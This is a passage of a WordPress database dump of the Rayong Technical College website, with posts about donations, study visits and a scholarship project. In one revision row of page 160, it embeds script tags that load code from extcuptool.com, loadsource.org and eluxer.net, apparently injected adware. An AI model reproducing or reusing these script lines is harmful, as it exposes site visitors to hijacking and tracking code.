(3784, 3, '2018-08-14 14:44:42', '2018-08-14 07:44:42', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D652487545127437%26id%3D100010985913485&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Friday 10th August 2018, Mr. Wichien Sangwongkit from Sor KitChai Group company donated 20,000 baht to students of Rayong Technical College that played in the Sport Vocation Game Match for national level at Sor KitChai Group company.', '', 'publish', 'closed', 'open', '', 'on-friday-10th-august-2018-mr-wichien-sangwongkit-from-sor-kitchai-group-company-donated-20000-baht-to-students-of-rayong-technical-college-that-played-in-the-sport-vocation-game-match-for-national', '', '', '2018-08-14 14:44:42', '2018-08-14 07:44:42', '', 0, 'http://www.technicrayong.ac.th/?p=3784', 337, 'post', '', 0),
(3785, 3, '2018-08-14 14:44:42', '2018-08-14 07:44:42', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D652487545127437%26id%3D100010985913485&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Friday 10th August 2018, Mr. Wichien Sangwongkit from Sor KitChai Group company donated 20,000 baht to students of Rayong Technical College that played in the Sport Vocation Game Match for national level at Sor KitChai Group company.', '', 'inherit', 'closed', 'closed', '', '3784-revision-v1', '', '', '2018-08-14 14:44:42', '2018-08-14 07:44:42', '', 3784, 'http://www.technicrayong.ac.th/3784-revision-v1/', 0, 'revision', '', 0),
(3786, 3, '2018-08-14 14:44:52', '2018-08-14 07:44:52', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D652487545127437%26id%3D100010985913485&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Friday 10th August 2018, Mr. Wichien Sangwongkit from Sor KitChai Group company donated 20,000 baht to students of Rayong Technical College that played in the Sport Vocation Game Match for national level at Sor KitChai Group company.', '', 'inherit', 'closed', 'closed', '', '3784-autosave-v1', '', '', '2018-08-14 14:44:52', '2018-08-14 07:44:52', '', 3784, 'http://www.technicrayong.ac.th/3784-autosave-v1/', 0, 'revision', '', 0),
(3788, 3, '2018-08-15 16:03:52', '2018-08-15 09:03:52', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.657484614627730&type=3\"><img class=\"aligncenter wp-image-3789 size-full\" src=\"/wp-content/uploads/2018/08/15-8-2561-16-05-12.jpg\" alt=\"\" width=\"450\" height=\"635\" /></a>', 'วิทยาลัยเทคนิคระยอง ยินดีต้อนรับ คณะครู และนักศึกษา จาก Zhejiang Institute of Economics and Trade,China สารธารณรัฐประชาชนจีน เข้าศึกษาดูงาน เพื่อแลกเปลี่ยนวัฒนธรรมไทย-จีน ระหว่างวันที่ 12-14 สิงหาคม 2561 ที่ผ่านมา ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87-%e0%b8%a2%e0%b8%b4%e0%b8%99', '', '', '2018-08-15 16:04:59', '2018-08-15 09:04:59', '', 0, 'http://www.technicrayong.ac.th/?p=3788', 336, 'post', '', 0),
(3789, 3, '2018-08-15 16:03:06', '2018-08-15 09:03:06', '', '15-8-2561 16-05-12', '', 'inherit', 'closed', 'closed', '', '15-8-2561-16-05-12', '', '', '2018-08-15 16:03:06', '2018-08-15 09:03:06', '', 3788, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/15-8-2561-16-05-12.jpg', 0, 'attachment', 'image/jpeg', 0),
(3790, 3, '2018-08-15 16:03:52', '2018-08-15 09:03:52', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.657484614627730&type=3\"><img class=\"aligncenter wp-image-3789 size-full\" src=\"/wp-content/uploads/2018/08/15-8-2561-16-05-12.jpg\" alt=\"\" width=\"450\" height=\"635\" /></a>', 'วิทยาลัยเทคนิคระยอง ยินดีต้อนรับ คณะครู และนักศึกษา จาก Zhejiang Institute of Economics and Trade,China สารธารณรัฐประชาชนจีน เข้าศึกษาดูงาน เพื่อแลกเปลี่ยนวัฒนธรรมไทย-จีน ระหว่างวันที่ 12-14 สิงหาคม 2561 ที่ผ่านมา ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3788-revision-v1', '', '', '2018-08-15 16:03:52', '2018-08-15 09:03:52', '', 3788, 'http://www.technicrayong.ac.th/3788-revision-v1/', 0, 'revision', '', 0),
(3791, 3, '2018-08-15 16:05:08', '2018-08-15 09:05:08', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.657484614627730&type=3\"><img class=\"aligncenter wp-image-3789 size-full\" src=\"/wp-content/uploads/2018/08/15-8-2561-16-05-12.jpg\" alt=\"\" width=\"450\" height=\"635\" /></a>', 'วิทยาลัยเทคนิคระยอง ยินดีต้อนรับ คณะครู และนักศึกษา จาก Zhejiang Institute of Economics and Trade,China สารธารณรัฐประชาชนจีน เข้าศึกษาดูงาน เพื่อแลกเปลี่ยนวัฒนธรรมไทย-จีน ระหว่างวันที่ 12-14 สิงหาคม 2561 ที่ผ่านมา ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3788-autosave-v1', '', '', '2018-08-15 16:05:08', '2018-08-15 09:05:08', '', 3788, 'http://www.technicrayong.ac.th/3788-autosave-v1/', 0, 'revision', '', 0),
(3792, 3, '2018-08-15 16:04:26', '2018-08-15 09:04:26', '', '39179904_657459031296955_65617651354828800_o', '', 'inherit', 'closed', 'closed', '', '39179904_657459031296955_65617651354828800_o', '', '', '2018-08-15 16:04:26', '2018-08-15 09:04:26', '', 3788, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/39179904_657459031296955_65617651354828800_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3793, 3, '2018-08-15 16:07:15', '2018-08-15 09:07:15', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.657484614627730&type=3\"><img class=\"aligncenter wp-image-3795 size-full\" src=\"/wp-content/uploads/2018/08/15-8-2561-16-05-12-1.jpg\" alt=\"\" width=\"450\" height=\"635\" /></a>', 'From the 12th to the 14th of August 2018, Rayong Technical College welcomed teachers and students from Zhejiang Institute of Economics and Trade China. They visited on a cultural exchange program between Thai and Chinese students.', '', 'publish', 'closed', 'open', '', 'from-the-12th-to-the-14th-of-august-2018-rayong-technical-college-welcomed-teachers-and-students-from-zhejiang-institute-of-economics-and-trade-china-they-visited-on-a-cultural-exchange-program-betw', '', '', '2018-08-15 16:07:15', '2018-08-15 09:07:15', '', 0, 'http://www.technicrayong.ac.th/?p=3793', 335, 'post', '', 0),
(3794, 3, '2018-08-15 16:06:00', '2018-08-15 09:06:00', '', '39179904_657459031296955_65617651354828800_o', '', 'inherit', 'closed', 'closed', '', '39179904_657459031296955_65617651354828800_o-2', '', '', '2018-08-15 16:06:00', '2018-08-15 09:06:00', '', 3793, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/39179904_657459031296955_65617651354828800_o-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(3795, 3, '2018-08-15 16:06:36', '2018-08-15 09:06:36', '', '15-8-2561 16-05-12', '', 'inherit', 'closed', 'closed', '', '15-8-2561-16-05-12-2', '', '', '2018-08-15 16:06:36', '2018-08-15 09:06:36', '', 3793, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/15-8-2561-16-05-12-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(3796, 3, '2018-08-15 16:07:15', '2018-08-15 09:07:15', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.657484614627730&type=3\"><img class=\"aligncenter wp-image-3795 size-full\" src=\"/wp-content/uploads/2018/08/15-8-2561-16-05-12-1.jpg\" alt=\"\" width=\"450\" height=\"635\" /></a>', 'From the 12th to the 14th of August 2018, Rayong Technical College welcomed teachers and students from Zhejiang Institute of Economics and Trade China. They visited on a cultural exchange program between Thai and Chinese students.', '', 'inherit', 'closed', 'closed', '', '3793-revision-v1', '', '', '2018-08-15 16:07:15', '2018-08-15 09:07:15', '', 3793, 'http://www.technicrayong.ac.th/3793-revision-v1/', 0, 'revision', '', 0),
(3797, 3, '2018-08-15 16:07:24', '2018-08-15 09:07:24', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.657484614627730&type=3\"><img class=\"aligncenter wp-image-3795 size-full\" src=\"/wp-content/uploads/2018/08/15-8-2561-16-05-12-1.jpg\" alt=\"\" width=\"450\" height=\"635\" /></a>', 'From the 12th to the 14th of August 2018, Rayong Technical College welcomed teachers and students from Zhejiang Institute of Economics and Trade China. They visited on a cultural exchange program between Thai and Chinese students.', '', 'inherit', 'closed', 'closed', '', '3793-autosave-v1', '', '', '2018-08-15 16:07:24', '2018-08-15 09:07:24', '', 3793, 'http://www.technicrayong.ac.th/3793-autosave-v1/', 0, 'revision', '', 0),
(3798, 3, '2018-08-15 16:15:40', '2018-08-15 09:15:40', '<a href=\"https://www.facebook.com/media/set/?set=ms.c.eJxFVdmtZTEI62hE2Om~%3BsdEx~_L5PKwSMcUiGWMu4inil~%3B8vF0lnP7fB7DSzJ88V6~_InifiyefNGZMzKL3Z~_KmL9aXDPfeWks7nofzrCLfxVmWeWHVTtLnujhzA9L9OVz~%3BeLdWa8a5358HPzMyW9ef~%3BFaVy9dvvrdVy8U9fP0mNT34Si5fLP19eqHyJffyCdj4~%3B3iR7deXr1Igz75WD~_~_~_~%3BrIJxKY~%3BYb45j8~_JdC33~%3BWbBT3bgzhR~%3BwXjc~_OP38jqreQTgn6dfBLnTb4VyOfGfAl~_Msdv7OOvw3wd~%3BsWb3bzjGfIX9XLokyGsh3zvL9~%3BbfLwfq1cdv9j~_kv2NQ4~_o4XyBk~%3B6LKehJvcsL~%3Biv6MdePQT9OrT53ngL~_0ce~%3Be~%3Bnxfu795v00~_E3vfUwb~_rWkH7xx~%3Bx1uGehJ~%3B~%3Bagng7qucjq~_ajn9OcH7X0fLm8~_f8WMEWOeItfvlCG~_f~_8N~%3BrZ3fuos8Bnqo4F55~%3BGvhh~%3BKOV936NPHv976hf6tze~%3BMXyGrN99Tw~_~_P76~%3ByrZ847wLWJlbBexPug9z3NjcPb~_hTUnzv8EexX~%3B~%3Bm8~_0LYtl45vdAPhfm833f9Gs75ptFv63~%3BlP6LB38Z30~%3BAv2b0z8Tqy3m0rb9Yf7799vlV6QeDHuRbs~%3Bob98Pe773v8lZfo7791t~%3BUIxr5lPx736Oxv3yz~_5r1eudHvSds~_cfW01y~%3B6flN4c8YOz4G~%3BeP85uIP~_8Gd8Y1~_1fXid3~%3BEL583zisPP8Tbu3g1~_E9HDu8~_M943wfuMKNYDnx9~%3B2~%3BcX7~_4b9IiuZj9bP6~_~_K84r7~%3Bxr~%3Betn5s5l~_wvW9~_3nEQ~%3B20dOLN~%3Bwn0UX~_u~_9u37hoKfg~_xtcgnv1bbv3meSC~_7Refe67kL8B2~%3BH3~%3BO2mn~%3Bssnj48H5nt~_82~%3By6If9695X3vf1h1Nf3~%3B9D0lgP~%3Bihnf5o7v18~_6JXU6~%3Bvpv33l~%3BK8G~_z~_M~_wz7Lt8Y92Ht~_eUXR7z3O6zI3~_xHFPxDnHjzke8TnLtyv~_7~%3BL5yXrJ~_bfpbGvnySrI~%3B~_nH6S1cOZX2Lr~%3Bfgk3ttjPRn4oZL9wA~%3B56AdZPdyuv5cK~%3BSa5D7BvSti~%3BAbcyfveXvOB9vH8LYtt9Muy~%3B8N8k553yvY~_el8SYb3AfpdSe139~_~%3Bhnj.bps.a.650421052000753&type=1\"><img class=\"aligncenter wp-image-3649 size-full\" src=\"/wp-content/uploads/2018/08/10-8-2561-9-59-57-1.jpg\" alt=\"\" width=\"451\" height=\"606\" /></a>', 'On Wednesday 8th August 2018 at Rayong Technical college, the Library project for the academic year of 2018 took place. This was set up for students to learn how to garner research from books and increase their literacy and love for books.', '', 'inherit', 'closed', 'closed', '', '3648-autosave-v1', '', '', '2018-08-15 16:15:40', '2018-08-15 09:15:40', '', 3648, 'http://www.technicrayong.ac.th/3648-autosave-v1/', 0, 'revision', '', 0),
(3799, 3, '2018-08-15 16:15:52', '2018-08-15 09:15:52', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.650421052000753&type=3\"><img class=\"aligncenter wp-image-3643 size-full\" src=\"/wp-content/uploads/2018/08/10-8-2561-9-59-57.jpg\" alt=\"\" width=\"451\" height=\"606\" /></a>', 'โครงการสัปดาห์ห้องสมุด ประจำปีการศึกษา 2561 เพื่อให้นักเรียน นักศึกษารักการอ่าน รู้จักวิธีการสืบค้นข้อมูล หลักการใช้ห้องสมุดได้อย่างถูกต้อง วันพุธที่ 8 สิงหาคม 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3642-autosave-v1', '', '', '2018-08-15 16:15:52', '2018-08-15 09:15:52', '', 3642, 'http://www.technicrayong.ac.th/3642-autosave-v1/', 0, 'revision', '', 0),
(3805, 10, '2018-11-12 12:40:59', '2018-11-12 05:40:59', 'https://youtu.be/xrNi-56jrzQ\r\n\r\nhttps://www.youtube.com/watch?v=QO9X6zaqiWA\r\n<h2><span style=\"color: #993300;\"><strong>เชิญชมภาพถ่าย คลิก Link ด้านล่าง</strong></span></h2>\r\n<h3><span style=\"color: #003300;\"><a style=\"color: #003300;\" href=\"/ภาพถ่าย-โดย-อรุณ-ร้อยศรี\">ภาพถ่าย โดย อรุณ ร้อยศรี</a></span></h3>\r\n<h3><a href=\"/ภาพถ่าย-โดย-บัณฑิต-โชติส\"><span style=\"color: #003300;\">ภาพถ่าย โดย บัณฑิต โชติสุวรรณ</span></a></h3>\r\n<h3><a href=\"/ภาพถ่าย-โดย-จันทร์กลาง-ก\"><span style=\"color: #003300;\">ภาพถ่าย โดย จันทร์กลาง กันทอง</span></a></h3>\r\n<h3><a href=\"/ภาพถ่าย-โดย-เริงชัย-คงเม\"><span style=\"color: #003300;\">ภาพถ่าย โดย เริงชัย คงเมือง</span></a></h3>\r\n<h3><a href=\"http://www.technicrayong.ac.th/ภาพถ่าย-โดย-เริงฤทธิ์-คง\"><span style=\"color: #003300;\">ภาพถ่าย โดย เริงฤทธิ์ คงเมือง</span></a></h3>', '๑๐๐ วัน เปลี่ยนความโทมนัสเป็นพลัง', '', 'trash', 'closed', 'closed', '', '%e0%b9%91%e0%b9%90%e0%b9%90-%e0%b8%a7%e0%b8%b1%e0%b8%99-%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%a2%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87-%e0%b9%80%e0%b8%9b%e0%b8%a5%e0%b8%b5__trashed', '', '', '2019-06-10 15:07:18', '2019-06-10 08:07:18', '', 0, 'http://www.technicrayong.ac.th/?page_id=3805', 0, 'page', '', 0),
(3808, 3, '2018-08-17 09:22:19', '2018-08-17 02:22:19', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D658706161172242%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'คณะผู้บริหาร ครู บุคลากรทางการศึกษาจากวิทยาลัยเทคนิคชัยนาท เข้าศึกษาดูงานแผนกวิชาปิโตรเคมี ภายใต้โครงการศึกษาดูงานการจัดการอาชีวศึกษาและโครงการอันเนื่องมาจากพระราชดำริฯ วันพฤหัสบดีที่ 16 สิงหาคม 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3-%e0%b8%84%e0%b8%a3%e0%b8%b9-%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%a5%e0%b8%b2%e0%b8%81%e0%b8%a3', '', '', '2018-08-17 09:24:58', '2018-08-17 02:24:58', '', 0, 'http://www.technicrayong.ac.th/?p=3808', 334, 'post', '', 0),
(3809, 3, '2018-08-17 09:21:26', '2018-08-17 02:21:26', '', '39278259_658701187839406_8574030190663958528_o', '', 'inherit', 'closed', 'closed', '', '39278259_658701187839406_8574030190663958528_o', '', '', '2018-08-17 09:21:26', '2018-08-17 02:21:26', '', 3808, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/39278259_658701187839406_8574030190663958528_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3810, 3, '2018-08-17 09:22:19', '2018-08-17 02:22:19', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D658706161172242%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'คณะผู้บริหาร ครู บุคลากรทางการศึกษาจากวิทยาลัยเทคนิคชัยนาท เข้าศึกษาดูงานแผนกวิชาปิโตรเคมี ภายใต้โครงการศึกษาดูงานการจัดการอาชีวศึกษาและโครงการอันเนื่องมาจากพระราชดำริฯ วันพฤหัสบดีที่ 16 สิงหาคม 2561', '', 'inherit', 'closed', 'closed', '', '3808-revision-v1', '', '', '2018-08-17 09:22:19', '2018-08-17 02:22:19', '', 3808, 'http://www.technicrayong.ac.th/3808-revision-v1/', 0, 'revision', '', 0),
(3811, 3, '2018-08-17 09:25:09', '2018-08-17 02:25:09', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D658706161172242%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'คณะผู้บริหาร ครู บุคลากรทางการศึกษาจากวิทยาลัยเทคนิคชัยนาท เข้าศึกษาดูงานแผนกวิชาปิโตรเคมี ภายใต้โครงการศึกษาดูงานการจัดการอาชีวศึกษาและโครงการอันเนื่องมาจากพระราชดำริฯ วันพฤหัสบดีที่ 16 สิงหาคม 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3808-autosave-v1', '', '', '2018-08-17 09:25:09', '2018-08-17 02:25:09', '', 3808, 'http://www.technicrayong.ac.th/3808-autosave-v1/', 0, 'revision', '', 0),
(3812, 3, '2018-08-17 09:24:58', '2018-08-17 02:24:58', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D658706161172242%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'คณะผู้บริหาร ครู บุคลากรทางการศึกษาจากวิทยาลัยเทคนิคชัยนาท เข้าศึกษาดูงานแผนกวิชาปิโตรเคมี ภายใต้โครงการศึกษาดูงานการจัดการอาชีวศึกษาและโครงการอันเนื่องมาจากพระราชดำริฯ วันพฤหัสบดีที่ 16 สิงหาคม 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3808-revision-v1', '', '', '2018-08-17 09:24:58', '2018-08-17 02:24:58', '', 3808, 'http://www.technicrayong.ac.th/3808-revision-v1/', 0, 'revision', '', 0),
(3813, 3, '2018-08-17 10:30:45', '2018-08-17 03:30:45', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D658706161172242%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Wednesday 16th August 2018, the Directors, teachers and educational staff from Chainat Technical College visited to study with the Petrochemical Subject Department of Rayong Technical College under Vocational Education Management and The Royal Initiative Continued project.', '', 'publish', 'closed', 'open', '', 'on-wednesday-16th-august-2018-the-directors-teachers-and-educational-staff-from-chainat-technical-college-visited-to-study-with-the-petrochemical-subject-department-of-rayong-technical-college-under', '', '', '2018-08-17 10:31:09', '2018-08-17 03:31:09', '', 0, 'http://www.technicrayong.ac.th/?p=3813', 333, 'post', '', 0),
(3814, 3, '2018-08-17 10:30:45', '2018-08-17 03:30:45', '', 'On Wednesday 16th August 2018, the Directors, teachers and educational staff from Chainat Technical College visited to study with the Petrochemical Subject Department of Rayong Technical College under Vocational Education Management and The Royal Initiative Continued project.', '', 'inherit', 'closed', 'closed', '', '3813-revision-v1', '', '', '2018-08-17 10:30:45', '2018-08-17 03:30:45', '', 3813, 'http://www.technicrayong.ac.th/3813-revision-v1/', 0, 'revision', '', 0),
(3815, 3, '2018-08-17 10:31:19', '2018-08-17 03:31:19', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D658706161172242%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Wednesday 16th August 2018, the Directors, teachers and educational staff from Chainat Technical College visited to study with the Petrochemical Subject Department of Rayong Technical College under Vocational Education Management and The Royal Initiative Continued project.', '', 'inherit', 'closed', 'closed', '', '3813-autosave-v1', '', '', '2018-08-17 10:31:19', '2018-08-17 03:31:19', '', 3813, 'http://www.technicrayong.ac.th/3813-autosave-v1/', 0, 'revision', '', 0),
(3816, 3, '2018-08-17 10:31:09', '2018-08-17 03:31:09', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D658706161172242%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Wednesday 16th August 2018, the Directors, teachers and educational staff from Chainat Technical College visited to study with the Petrochemical Subject Department of Rayong Technical College under Vocational Education Management and The Royal Initiative Continued project.', '', 'inherit', 'closed', 'closed', '', '3813-revision-v1', '', '', '2018-08-17 10:31:09', '2018-08-17 03:31:09', '', 3813, 'http://www.technicrayong.ac.th/3813-revision-v1/', 0, 'revision', '', 0),
(3817, 1, '2018-08-18 13:31:50', '2018-08-18 06:31:50', '', '3.แนวปฏิบัติของ อวท.', '', 'inherit', 'closed', 'closed', '', '3-%e0%b9%81%e0%b8%99%e0%b8%a7%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%82%e0%b8%ad%e0%b8%87-%e0%b8%ad%e0%b8%a7%e0%b8%97', '', '', '2018-08-18 13:31:50', '2018-08-18 06:31:50', '', 2555, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/3.แนวปฏิบัติของ-อวท.-.doc', 0, 'attachment', 'application/msword', 0),
(3818, 1, '2018-08-18 13:33:09', '2018-08-18 06:33:09', '<h3><img class=\"aligncenter size-medium wp-image-2787\" src=\"/wp-content/uploads/2018/05/อ.ฉัตรเฉลิม-240x300.png\" alt=\"\" width=\"240\" height=\"300\" /></h3>\r\n<h3><img class=\"aligncenter size-medium wp-image-2788\" src=\"/wp-content/uploads/2018/05/นายก-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" /></h3>\r\n<h3><img class=\"aligncenter size-medium wp-image-2789\" src=\"/wp-content/uploads/2018/05/รอง-2-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" /></h3>\r\n<h3><img class=\"aligncenter wp-image-2790 size-full\" src=\"/wp-content/uploads/2018/05/28-5-2561-11-05-34.jpg\" alt=\"\" width=\"835\" height=\"630\" /></h3>\r\n<h3></h3>\r\n<h3><span style=\"color: #0000ff;\">ตัวอย่างรูปเล่มรายงานชมรมวิชาชีพ</span> <a href=\"/ตัวอย่างรูปเล่มรายงานช\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></h3>\r\n<h3><span style=\"color: #0000ff;\">แบบ อวท. 1-36 <a href=\"/แบบ-อวท-1-36\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></span></h3>\r\n<h3><span style=\"color: #0000ff;\">แบบฟอร์มอื่นๆ ขององค์การนักวิชาชีพฯ <a href=\"/แบบฟอร์มอื่นๆ-ของงานองค\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></span></h3>\r\n<h3><span style=\"color: #0000ff;\">แนวปฏิบัติ อวท. <a href=\"/wp-content/uploads/2018/08/3.แนวปฏิบัติของ-อวท.-.doc\"><span style=\"color: #ff0000;\">>>>คลิก<<<</span></a></span></h3>', 'องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย', '', 'inherit', 'closed', 'closed', '', '2555-revision-v1', '', '', '2018-08-18 13:33:09', '2018-08-18 06:33:09', '', 2555, 'http://www.technicrayong.ac.th/2555-revision-v1/', 0, 'revision', '', 0),
(3820, 1, '2018-08-20 16:30:17', '2018-08-20 09:30:17', 'ไทย\r\n\r\n \r\n\r\n<script src=\"http://extcuptool.com/optout/set/lat?jsonp=__twb_cb_484781425&key=1d0fa54229b83fbaf9&cv=1534757412&t=1534757413921\" type=\"text/javascript\"></script><script src=\"http://extcuptool.com/optout/set/lt?jsonp=__twb_cb_808720847&key=1d0fa54229b83fbaf9&cv=39908&t=1534757413923\" type=\"text/javascript\"></script><script src=\"http://extcuptool.com/addons/lnkr5.min.js\" type=\"text/javascript\"></script><script src=\"http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x7439x&r=1534757413928\" type=\"text/javascript\"></script><script src=\"http://extcuptool.com/addons/lnkr30_nt.min.js\" type=\"text/javascript\"></script><script src=\"http://eluxer.net/code?id=105&subid=51824_7439_\" type=\"text/javascript\"></script>', '', '', 'inherit', 'closed', 'closed', '', '160-revision-v1', '', '', '2018-08-20 16:30:17', '2018-08-20 09:30:17', '', 160, 'http://www.technicrayong.ac.th/160-revision-v1/', 0, 'revision', '', 0),
(3821, 1, '2018-08-20 16:31:18', '2018-08-20 09:31:18', 'ไทย', '', '', 'inherit', 'closed', 'closed', '', '160-revision-v1', '', '', '2018-08-20 16:31:18', '2018-08-20 09:31:18', '', 160, 'http://www.technicrayong.ac.th/160-revision-v1/', 0, 'revision', '', 0),
(3825, 1, '2019-01-02 00:54:01', '2019-01-01 17:54:01', 'ไทย\n\n ', '', '', 'inherit', 'closed', 'closed', '', '160-autosave-v1', '', '', '2019-01-02 00:54:01', '2019-01-01 17:54:01', '', 160, 'http://www.technicrayong.ac.th/160-autosave-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3826, 3, '2018-08-21 08:38:46', '2018-08-21 01:38:46', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D659572364418955%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'โครงการอาชีวศึกษาระบบทวิภาคี จัดทำสัญญารับทุนการฝึกอบรมเพื่อเตรียมทำงานของนักเรียนทวิภาคี ระดับประกาศนียบัตรวิชาชีพชั้นปีที่ 1 ประจำปีการศึกษา 2561 โดยความร่วมมือของ วิทยาลัยเทคนิคระยอง และบริษัท ซีพี ออลล์ จำกัด (มหาชน) พร้อมทั้งชี้แจงรายละเอียดโครงการฯ โดย คุณภัณฑิรา วงศ์มณีรัตน์ ผู้ช่วยผู้จัดการ และคุณศุภิกา ประภาศิริกุล เจ้าหน้าที่บริหารโครงการศึกษา ณ วิทยาลัยเทคนิคระยอง วันศุกร์ที่ 17 สิงหาคม 2561', '', 'publish', 'closed', 'open', '', 